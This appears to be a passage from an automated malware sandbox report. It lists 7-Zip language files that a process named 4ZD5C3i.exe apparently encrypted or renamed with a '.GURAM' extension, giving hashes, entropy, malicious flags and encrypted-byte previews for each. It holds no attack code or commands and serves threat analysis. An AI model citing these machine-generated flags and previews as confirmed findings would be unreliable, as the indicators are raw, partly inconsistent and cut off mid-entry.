                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ro.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8181
                                                                                                                                                                                                                                                Entropy (8bit):7.978963371440379
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:JUr8HrZFmmfnMD1KtdXAr+GWC6wCrpdylxD6Wx1gxZUC:JUruFmmfMJKrXw+GWC6bdylt6WPgOC
                                                                                                                                                                                                                                                MD5:BEF0C898A32A3559ABF1F4623A8CEAA7
                                                                                                                                                                                                                                                SHA1:798B28CBB887DB06AB1068DB2C944EADF669AC1F
                                                                                                                                                                                                                                                SHA-256:DAF211868D6FD5E8BF8589AC507115C43018FCC405A199A8442D414542DAC086
                                                                                                                                                                                                                                                SHA-512:BCE19473928B85AB218FD7EB1C885C6E6375F8FEB918AF512E370009C472FEFE2E7F7D3202091FE574AF2C59F54EAEE1629B8C8E05C162095515C2E14C573B64
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....6..|%.L...}E#..j]........*..I..xo .l....;e..../....q..(.z1.?...o..s&..g.\-.....V*a|.x5O.2]..v..`..F...G\ .w.a...qT..Sl0..-C..(a.i..?..%K.w.C...Fw-OX|.%..]P..... .K`.w.-.+%H..d.[..5....',y].......N....O.w..../FL(..EJ8.g......@..~R...].....Q.........ED.G...$g^..,h*.18...~...:..v..1.....nj......a.=...wz...;.x0y...&..$..,.V..=..4.1B.se.....Y....gI.7..FYE^.K'].7.#.\.{..w...B.*U9.5.......%|.s6..y<.v.X.X<....M.A..:(GO9.n.....XW.....)6.....4.Xk.<^/_..n.2q.t..lJ.L.U..P....3.C".C.....R..c..&.2I/nU).6H....8...5.p.EH.b>P........H.g..@..t'.Y....<....+f|...7....Lp.........P=AS.D.Y.....1Jy[...h.'.......^nq.........|....)i!.pJ-X..d+..o.....&...5*.?P-..V*9y>...^7..v..c.Fl. 8m..O.....Y{..>...K.'....4..U...'.D...j..y6.j^.Z.v.L..F=".Y......~.....^......A.4{.NB0X......:........&..}.............[6h...j. ..Kz.G.}.b.....=...;.5.w..f.Itq..N..*4...h...T..5...#.w.n..........;.....*!%.....3.#...j|..........uEx..O.......m+WI..+Y.Y...2{......N]g......G...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ro.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8181
                                                                                                                                                                                                                                                Entropy (8bit):7.978963371440379
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:JUr8HrZFmmfnMD1KtdXAr+GWC6wCrpdylxD6Wx1gxZUC:JUruFmmfMJKrXw+GWC6bdylt6WPgOC
                                                                                                                                                                                                                                                MD5:BEF0C898A32A3559ABF1F4623A8CEAA7
                                                                                                                                                                                                                                                SHA1:798B28CBB887DB06AB1068DB2C944EADF669AC1F
                                                                                                                                                                                                                                                SHA-256:DAF211868D6FD5E8BF8589AC507115C43018FCC405A199A8442D414542DAC086
                                                                                                                                                                                                                                                SHA-512:BCE19473928B85AB218FD7EB1C885C6E6375F8FEB918AF512E370009C472FEFE2E7F7D3202091FE574AF2C59F54EAEE1629B8C8E05C162095515C2E14C573B64
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....6..|%.L...}E#..j]........*..I..xo .l....;e..../....q..(.z1.?...o..s&..g.\-.....V*a|.x5O.2]..v..`..F...G\ .w.a...qT..Sl0..-C..(a.i..?..%K.w.C...Fw-OX|.%..]P..... .K`.w.-.+%H..d.[..5....',y].......N....O.w..../FL(..EJ8.g......@..~R...].....Q.........ED.G...$g^..,h*.18...~...:..v..1.....nj......a.=...wz...;.x0y...&..$..,.V..=..4.1B.se.....Y....gI.7..FYE^.K'].7.#.\.{..w...B.*U9.5.......%|.s6..y<.v.X.X<....M.A..:(GO9.n.....XW.....)6.....4.Xk.<^/_..n.2q.t..lJ.L.U..P....3.C".C.....R..c..&.2I/nU).6H....8...5.p.EH.b>P........H.g..@..t'.Y....<....+f|...7....Lp.........P=AS.D.Y.....1Jy[...h.'.......^nq.........|....)i!.pJ-X..d+..o.....&...5*.?P-..V*9y>...^7..v..c.Fl. 8m..O.....Y{..>...K.'....4..U...'.D...j..y6.j^.Z.v.L..F=".Y......~.....^......A.4{.NB0X......:........&..}.............[6h...j. ..Kz.G.}.b.....=...;.5.w..f.Itq..N..*4...h...T..5...#.w.n..........;.....*!%.....3.#...j|..........uEx..O.......m+WI..+Y.Y...2{......N]g......G...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ru.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15974
                                                                                                                                                                                                                                                Entropy (8bit):7.989449367819548
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:khwC/KMeRnzlYNu02sahHnuIiQOXHXg62w7tppdDEv+F:khK/JDsUHqQOXHL2w5ppd4v+F
                                                                                                                                                                                                                                                MD5:B29264E70C8D28B5F6A3F582F1CD9D93
                                                                                                                                                                                                                                                SHA1:C53FD7445B37E53C00F7878ECB072AA12A093C9F
                                                                                                                                                                                                                                                SHA-256:004DFCB78194C699076351A35880A16A1599B185825BB9F23EA47E0109318BBF
                                                                                                                                                                                                                                                SHA-512:B1A5ABA701FE0086D08070CE4C9755B0ECC45415CDA2C26FEE7807C19B83203A3246EB8A2F067EDDDA3783DD02BD331F858FC1061CC91304C16EEF21B5663F79
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..w.:qQ.%..t..b.-.*E$?.........m...@$X./*.W....A..,.2.......v....KB+........[K.a2.g.......+]H/.U1Y.B....)G.N.r....Z.X."H.Js....Z.;^.?..WZ...+{..w...w.,.O....+.....} ...X'lW.qg....4...l....d.]Z=.b................g9e.....3..%.R.6Q.gW.A..f<g......y5EGW....~......e^e....+......P..A..5..K....}P.A.5..`.*.w...F+.....[.f........2}.D...un..X.-.e..........|T.KJ.6L(E..71...'._y ...~lF)..6..u.8...C.....0q....O...J...5R.......R..6....f....Z....k5.1.?.y.EH}.|m(D...,..&/.SPq.y.].&u9.... o..q.{..!?...6.@z-.\..rMF*F.w.J....\.m!g.izA..{........ `4zs3.9..m..j_.......\I...........H...e.O...<....(t......%.ZD..Z...".{.L*..."...E0.......uh......8...5..Z-Q.ZQ....~.?..P...+x..S...)....E..ZS.....7...j_8..z6..(k...&.X...z....{.V.....Y.a...#...:x..J^..O.w...{.....@...x._.....v....t./.p.gKzG.(.sU.U.Z...[.3....k>,Yj>(..Z.().f.q..tb ..,y.R..f.2?...c2....f.fQG.OS[.....I.]!...pKl...A.FN...zQ.5%.6..|'....d....&.....~.>....4...7d....)..@..mvl.?.x.....b..*....+.J.Jp..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ru.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15974
                                                                                                                                                                                                                                                Entropy (8bit):7.989449367819548
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:khwC/KMeRnzlYNu02sahHnuIiQOXHXg62w7tppdDEv+F:khK/JDsUHqQOXHL2w5ppd4v+F
                                                                                                                                                                                                                                                MD5:B29264E70C8D28B5F6A3F582F1CD9D93
                                                                                                                                                                                                                                                SHA1:C53FD7445B37E53C00F7878ECB072AA12A093C9F
                                                                                                                                                                                                                                                SHA-256:004DFCB78194C699076351A35880A16A1599B185825BB9F23EA47E0109318BBF
                                                                                                                                                                                                                                                SHA-512:B1A5ABA701FE0086D08070CE4C9755B0ECC45415CDA2C26FEE7807C19B83203A3246EB8A2F067EDDDA3783DD02BD331F858FC1061CC91304C16EEF21B5663F79
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..w.:qQ.%..t..b.-.*E$?.........m...@$X./*.W....A..,.2.......v....KB+........[K.a2.g.......+]H/.U1Y.B....)G.N.r....Z.X."H.Js....Z.;^.?..WZ...+{..w...w.,.O....+.....} ...X'lW.qg....4...l....d.]Z=.b................g9e.....3..%.R.6Q.gW.A..f<g......y5EGW....~......e^e....+......P..A..5..K....}P.A.5..`.*.w...F+.....[.f........2}.D...un..X.-.e..........|T.KJ.6L(E..71...'._y ...~lF)..6..u.8...C.....0q....O...J...5R.......R..6....f....Z....k5.1.?.y.EH}.|m(D...,..&/.SPq.y.].&u9.... o..q.{..!?...6.@z-.\..rMF*F.w.J....\.m!g.izA..{........ `4zs3.9..m..j_.......\I...........H...e.O...<....(t......%.ZD..Z...".{.L*..."...E0.......uh......8...5..Z-Q.ZQ....~.?..P...+x..S...)....E..ZS.....7...j_8..z6..(k...&.X...z....{.V.....Y.a...#...:x..J^..O.w...{.....@...x._.....v....t./.p.gKzG.(.sU.U.Z...[.3....k>,Yj>(..Z.().f.q..tb ..,y.R..f.2?...c2....f.fQG.OS[.....I.]!...pKl...A.FN...zQ.5%.6..|'....d....&.....~.>....4...7d....)..@..mvl.?.x.....b..*....+.J.Jp..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sa.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19846
                                                                                                                                                                                                                                                Entropy (8bit):7.988544523052656
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:a5zKhoGtvUOoBi9tiIYfwfT8aLFHKcQB0qHPz2WtLkcxXqR/luaEX:aQqi+vfwFU1H7LtLkcx6buaEX
                                                                                                                                                                                                                                                MD5:9BFE7898BE20259CABA0EEF235EE7CC0
                                                                                                                                                                                                                                                SHA1:B6D82356FEDE18A8233583056A721989375CD081
                                                                                                                                                                                                                                                SHA-256:AC0E941827A8852051606304C6E0996CC1C5024210F7E352ABD5EC4069151DF5
                                                                                                                                                                                                                                                SHA-512:62976E8F932421D433234FFDE6165DD7A18E7D6EDAAEA866D993E94EA12BB74E21D5388DD933BC053AEC43DD694FDBF8FCE6044BF005964408DB459F72691E22
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..:...r....R...w-......LP.O.{f.[.^-.......c.{..?...h"1V..|.y}...s....R..r.#\..h..i...{.+.....):..3u1I.w..C!d&...--\E/..7...g.$.r..uc.&,Xz..&.M...F...k...*%...v{iM\....Y..z..`...$.EQ.yM. ..@...2.PR)....-.............aS$c.9.)O."7.[.........?~`koS.Rvx....\T"L.f....>...7.<%..&.;..I.:v.......7.u...c..at.q_..g.........o.yv.J..n.j....GG~L..>d.He....f.B........H......L,.K.......s....o...3.;.2._.W..V.....h.j....cL.0.6p3..f...=. ..E...manO.<N..F13W....>..*D.>...}..{.C.^kq..Nv]jqS.s.N.G1....N.O..,.0.K.c.6hX....n. .x_....W..eR...........0.A....}..y._J..kQ.DA.2.*y.......?.. A...L...>7.:..[~..MR@.'.~..".Lup...7W...W..T.B5.<w..X.....a...._.yXY....2x..Wj....~~..tM. W..y....Z..I.*...Ph.....E..i.........`..'O.y..{ .Q...0`)...C$..y.RQ.\..r.AZ.Y....]D..0..-WTR.J..Y[s...3....,.,[b...<....:..&5j.b......v.z..6+.[...a..Bxu.]...sKh.y8...x...x...'.:.D<d.A.T.rou.|..i.N/....h8'.0..f.tR.n82n.8..k....;.z.J.#8s.....w.+y...7....f_4g....G.v.Q}.....).i..\}...R.sjn.8.P...t.+

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sa.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19846
                                                                                                                                                                                                                                                Entropy (8bit):7.988544523052656
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:a5zKhoGtvUOoBi9tiIYfwfT8aLFHKcQB0qHPz2WtLkcxXqR/luaEX:aQqi+vfwFU1H7LtLkcx6buaEX
                                                                                                                                                                                                                                                MD5:9BFE7898BE20259CABA0EEF235EE7CC0
                                                                                                                                                                                                                                                SHA1:B6D82356FEDE18A8233583056A721989375CD081
                                                                                                                                                                                                                                                SHA-256:AC0E941827A8852051606304C6E0996CC1C5024210F7E352ABD5EC4069151DF5
                                                                                                                                                                                                                                                SHA-512:62976E8F932421D433234FFDE6165DD7A18E7D6EDAAEA866D993E94EA12BB74E21D5388DD933BC053AEC43DD694FDBF8FCE6044BF005964408DB459F72691E22
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..:...r....R...w-......LP.O.{f.[.^-.......c.{..?...h"1V..|.y}...s....R..r.#\..h..i...{.+.....):..3u1I.w..C!d&...--\E/..7...g.$.r..uc.&,Xz..&.M...F...k...*%...v{iM\....Y..z..`...$.EQ.yM. ..@...2.PR)....-.............aS$c.9.)O."7.[.........?~`koS.Rvx....\T"L.f....>...7.<%..&.;..I.:v.......7.u...c..at.q_..g.........o.yv.J..n.j....GG~L..>d.He....f.B........H......L,.K.......s....o...3.;.2._.W..V.....h.j....cL.0.6p3..f...=. ..E...manO.<N..F13W....>..*D.>...}..{.C.^kq..Nv]jqS.s.N.G1....N.O..,.0.K.c.6hX....n. .x_....W..eR...........0.A....}..y._J..kQ.DA.2.*y.......?.. A...L...>7.:..[~..MR@.'.~..".Lup...7W...W..T.B5.<w..X.....a...._.yXY....2x..Wj....~~..tM. W..y....Z..I.*...Ph.....E..i.........`..'O.y..{ .Q...0`)...C$..y.RQ.\..r.AZ.Y....]D..0..-WTR.J..Y[s...3....,.,[b...<....:..&5j.b......v.z..6+.[...a..Bxu.]...sKh.y8...x...x...'.:.D<d.A.T.rou.|..i.N/....h8'.0..f.tR.n82n.8..k....;.z.J.#8s.....w.+y...7....f_4g....G.v.Q}.....).i..\}...R.sjn.8.P...t.+

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\si.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19809
                                                                                                                                                                                                                                                Entropy (8bit):7.99025415176095
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:i3fZkM7c7CReahqqOmZMVhjn0/doVZ6Lbe87J4Ic/4QO4svg+gzxgxySJ:8kWc7CReahqqvYAdn28rcsSVgxySJ
                                                                                                                                                                                                                                                MD5:E4E26FCCB9D6C7A307DDC7D424B7AC94
                                                                                                                                                                                                                                                SHA1:BDE3CF6B30FDDD1E999678B1C78D1A828E15D1DD
                                                                                                                                                                                                                                                SHA-256:4FC3C7685EBAA0C4C3C35FBA0276E0C12529704A0FD0FCCFE50060745A9F0F16
                                                                                                                                                                                                                                                SHA-512:1CE69E546175BF2A1B42C76A1A2DF62E0FEBEFAF84DE42ABF88006747438371F35B69586AC8D1D01C27F4B170E1FE2542EE6CB3576F69FCFC2208A04A0B5C94C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:%.kP..orD.rP....^.O>b2_..L)E!.1...}[..o... 3...K.*..3..y3...wiP.^.Q......dU..W.....23...w..q.#.H'...=.8.*.K.K..b...8..6'..'.8..y.J..]:...yI7..{m.n1g#me.e<Jm......E._/..s.......RMU......lz."z...Oo.4...{....G).....k.ou..d5..=.T.......R..t.=.x5...u$.A..&..U..~....z...f.!.w.}.j....!...6..cYpZ...U..}.i.F]i.D....{{^.",.(.i%|.&.fJ..$..F.=...WD.<G...i.vm..:..b..j..._..0..@.lT40Q..n.N.~U....f;....go?.e.......7.L._... ..!.../[..6.}...>j...6r#...9f..H..3...y.j3?.i.$.....Z/S....Zt....3....Vr..d...GS.u...a.Q..X........."h....D....|W......)....Zw.+......er...ndqQ.,6.........."...\.*.....m....M...g>?..../&L..9......qc.'.....vt...U....H....U.....U.bj..;..Ph..".?..m.8...xy&..T...d..[T.W.Lo^wBn.;;m..D.G..Cc.Y....s...`.....u.+....F.\V.f(jM(...C{..,1..A...l...K....2.83"...}.).F.$...}.{..~.........;.'.}.`.Y.C....5?.ny....X".......X...*.......9.^<.;..nB...wb8p%p.....z.w.?...BK..E.4.tW...'.F.Q.92...?..RC....9../..u.{.Z}.%.....o8.....r.i...hP...%..pP...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\si.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19809
                                                                                                                                                                                                                                                Entropy (8bit):7.99025415176095
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:i3fZkM7c7CReahqqOmZMVhjn0/doVZ6Lbe87J4Ic/4QO4svg+gzxgxySJ:8kWc7CReahqqvYAdn28rcsSVgxySJ
                                                                                                                                                                                                                                                MD5:E4E26FCCB9D6C7A307DDC7D424B7AC94
                                                                                                                                                                                                                                                SHA1:BDE3CF6B30FDDD1E999678B1C78D1A828E15D1DD
                                                                                                                                                                                                                                                SHA-256:4FC3C7685EBAA0C4C3C35FBA0276E0C12529704A0FD0FCCFE50060745A9F0F16
                                                                                                                                                                                                                                                SHA-512:1CE69E546175BF2A1B42C76A1A2DF62E0FEBEFAF84DE42ABF88006747438371F35B69586AC8D1D01C27F4B170E1FE2542EE6CB3576F69FCFC2208A04A0B5C94C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:%.kP..orD.rP....^.O>b2_..L)E!.1...}[..o... 3...K.*..3..y3...wiP.^.Q......dU..W.....23...w..q.#.H'...=.8.*.K.K..b...8..6'..'.8..y.J..]:...yI7..{m.n1g#me.e<Jm......E._/..s.......RMU......lz."z...Oo.4...{....G).....k.ou..d5..=.T.......R..t.=.x5...u$.A..&..U..~....z...f.!.w.}.j....!...6..cYpZ...U..}.i.F]i.D....{{^.",.(.i%|.&.fJ..$..F.=...WD.<G...i.vm..:..b..j..._..0..@.lT40Q..n.N.~U....f;....go?.e.......7.L._... ..!.../[..6.}...>j...6r#...9f..H..3...y.j3?.i.$.....Z/S....Zt....3....Vr..d...GS.u...a.Q..X........."h....D....|W......)....Zw.+......er...ndqQ.,6.........."...\.*.....m....M...g>?..../&L..9......qc.'.....vt...U....H....U.....U.bj..;..Ph..".?..m.8...xy&..T...d..[T.W.Lo^wBn.;;m..D.G..Cc.Y....s...`.....u.+....F.\V.f(jM(...C{..,1..A...l...K....2.83"...}.).F.$...}.{..~.........;.'.}.`.Y.C....5?.ny....X".......X...*.......9.^<.;..nB...wb8p%p.....z.w.?...BK..E.4.tW...'.F.Q.92...?..RC....9../..u.{.Z}.%.....o8.....r.i...hP...%..pP...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sk.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9980
                                                                                                                                                                                                                                                Entropy (8bit):7.981115893001809
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:btZyUvIL66ZJ3RTqf1TT0lPNYk/v4wxC0iTVbzIKweVgzzxEHkUHQs70yyUH:btZmdZJyQGk/vPC0ixb/jex8xws7lH
                                                                                                                                                                                                                                                MD5:5C0A98AB52E4D6A71C6952857408DEA7
                                                                                                                                                                                                                                                SHA1:A46A336FA52354F3327739D67404B88748D928E9
                                                                                                                                                                                                                                                SHA-256:143992B7688831725E47F02D14ADDC70C32EDA75E41D0FE3E24FBCB75EE9760F
                                                                                                                                                                                                                                                SHA-512:5BC0EB0A544EB66ABCD6465160ECA7A2FB19B3034EC960DFAB51C22F792D7C708BED5F59FC7CC2722C2D967BC272F88CEA76AB7E1219A60D44B0F2CEE39971B6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:S..T.>A/\......d.....^_L.<.KfM...s:...X,j.5.?.....-^.*f.....+........<...w.<e..h.../..\.!....J/..d...k.5qu.....*.....)D...:...s/p'.%..C.z...!...G....9.....q.J.}...un.P.?@>.0.g.a.v.....B..C....._.....H]6.6...uD.....:..I.-\........<.ipnv...n.!..6.... .~.$.yS....fz?&,.......7.E:.....#...I.C.yo.@.....Q....\..t;2@.*.2E.X...,w*..ZW..%.....8..nr..1.....Z.....+..#...9,..Wq&.pp.n...A....hG>IQ..>O.%.S...(m.-U..P......6I.V.i........l.h.oi3.v...m...r....q...V.x..au.;HWK\u.,sj1....7y'..}<......z..=...~..g..#.U....f..yp..q..?6.qv....(.-T......N.Dn..r...ky;W..,.....sK...%.!..[.%.{.2..L!.g....4..?.;.2./..v.@..u.@.{k=rrj...*.j.5P`..*.....|mg..k.In+...t.`.vH..|.............PL....g[.j.2*.........?..E............R...W.`..9.......H...O....t..K..T.h...2(.'..X.|..s....].....R 4...d;CN.Hd...U..m...f..O......1X.....f"T..Ap.!&..z.,//C..;..&.6o4.g.N8...:k.]K.K"CB..0..|...,..).K..g...P..>4....L...*.._......0.F.h.tL1....c.H........N;WI..D.4.x.:Q.e.R.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sk.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9980
                                                                                                                                                                                                                                                Entropy (8bit):7.981115893001809
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:btZyUvIL66ZJ3RTqf1TT0lPNYk/v4wxC0iTVbzIKweVgzzxEHkUHQs70yyUH:btZmdZJyQGk/vPC0ixb/jex8xws7lH
                                                                                                                                                                                                                                                MD5:5C0A98AB52E4D6A71C6952857408DEA7
                                                                                                                                                                                                                                                SHA1:A46A336FA52354F3327739D67404B88748D928E9
                                                                                                                                                                                                                                                SHA-256:143992B7688831725E47F02D14ADDC70C32EDA75E41D0FE3E24FBCB75EE9760F
                                                                                                                                                                                                                                                SHA-512:5BC0EB0A544EB66ABCD6465160ECA7A2FB19B3034EC960DFAB51C22F792D7C708BED5F59FC7CC2722C2D967BC272F88CEA76AB7E1219A60D44B0F2CEE39971B6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:S..T.>A/\......d.....^_L.<.KfM...s:...X,j.5.?.....-^.*f.....+........<...w.<e..h.../..\.!....J/..d...k.5qu.....*.....)D...:...s/p'.%..C.z...!...G....9.....q.J.}...un.P.?@>.0.g.a.v.....B..C....._.....H]6.6...uD.....:..I.-\........<.ipnv...n.!..6.... .~.$.yS....fz?&,.......7.E:.....#...I.C.yo.@.....Q....\..t;2@.*.2E.X...,w*..ZW..%.....8..nr..1.....Z.....+..#...9,..Wq&.pp.n...A....hG>IQ..>O.%.S...(m.-U..P......6I.V.i........l.h.oi3.v...m...r....q...V.x..au.;HWK\u.,sj1....7y'..}<......z..=...~..g..#.U....f..yp..q..?6.qv....(.-T......N.Dn..r...ky;W..,.....sK...%.!..[.%.{.2..L!.g....4..?.;.2./..v.@..u.@.{k=rrj...*.j.5P`..*.....|mg..k.In+...t.`.vH..|.............PL....g[.j.2*.........?..E............R...W.`..9.......H...O....t..K..T.h...2(.'..X.|..s....].....R 4...d;CN.Hd...U..m...f..O......1X.....f"T..Ap.!&..z.,//C..;..&.6o4.g.N8...:k.]K.K"CB..0..|...,..).K..g...P..>4....L...*.._......0.F.h.tL1....c.H........N;WI..D.4.x.:Q.e.R.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sl.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9529
                                                                                                                                                                                                                                                Entropy (8bit):7.98123843874199
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Xb/h4qr1KmXlh/ORYcUSDiDE/J0rIMns1SdSW1dFt/UcE:L/uqrnkH2DQJHScWRt8p
                                                                                                                                                                                                                                                MD5:18FFFB2E6DDA87F69BA1C55901130D5E
                                                                                                                                                                                                                                                SHA1:4EF6305AD5DADFCEA21326EF3113E5ADA335EBBF
                                                                                                                                                                                                                                                SHA-256:0C35AFD5170C593F73426468CC8C745F6DE7A4884CBF6E5BC5B2B9FA5092F412
                                                                                                                                                                                                                                                SHA-512:7EC5A7A19D84EA88D7DD28F54277E11A825AE98B20DE06568739CC53A209B2FF1287BC7ADA6B87F9D8D4826D7B172067883AB5095CE0BBF810E38A00DD4C62C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..%.\"..@.u}5c..X...q;....er{C.4..$.@.....>.EW.d.|<p{.c..DZ...N.n.g..\.V.....W..4.....T...f..M....E....s...SF.......M....]..]..../?i........p.........r...0...].l.v.-......V.U...P-.5_....w<....p.7'X.}}.$...|g.K.Y....+........5K.a...Cz_../r...E....PQ j....X.R.....46u...B.T.S.8M...3.L..6.|.V......P.2O..M..N..0..X...ut.......h.(I..'dD.F.@Nng.$~Z.78.=..M ....yI...$..9..Y.a.*.....o.rm).H.d......7.a..#.im.2E..M.J.g%MM.[.f[.AT.3.`.DS\.)......-.K ..r.o....-......5e.....,...l.,*.....4:..A....._...F./.)}.........e..95...?..f.-S-...p....#..p.:.H......a{....;......Ln..W...i..s.R.=!....G...$w..7.=.).....@f.|.OO...,..F.m...xn.O....|._....,.?x...D`8.*..tC.6J.O....7.1.8.U/.j.{..iu..^...k.....&....&.k=Z!.3..x..h.....|.zY, ..d...<.....$...I...P_.v.E..O.....N.>.}m.lq.M..b .:x.(6s\.g57.t.kTyx.h.(.(D.i.e.J.J......b.n.'....X...*9xD...b.U.0...MC...x.a.!Li7.e.#......\D9._1Z..xh9ncj.r.}G.....6..C.....7!.~.(.....>......;d*.4..B..;~u~`..Q..E"...".+.....4.,D

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sl.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9529
                                                                                                                                                                                                                                                Entropy (8bit):7.98123843874199
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Xb/h4qr1KmXlh/ORYcUSDiDE/J0rIMns1SdSW1dFt/UcE:L/uqrnkH2DQJHScWRt8p
                                                                                                                                                                                                                                                MD5:18FFFB2E6DDA87F69BA1C55901130D5E
                                                                                                                                                                                                                                                SHA1:4EF6305AD5DADFCEA21326EF3113E5ADA335EBBF
                                                                                                                                                                                                                                                SHA-256:0C35AFD5170C593F73426468CC8C745F6DE7A4884CBF6E5BC5B2B9FA5092F412
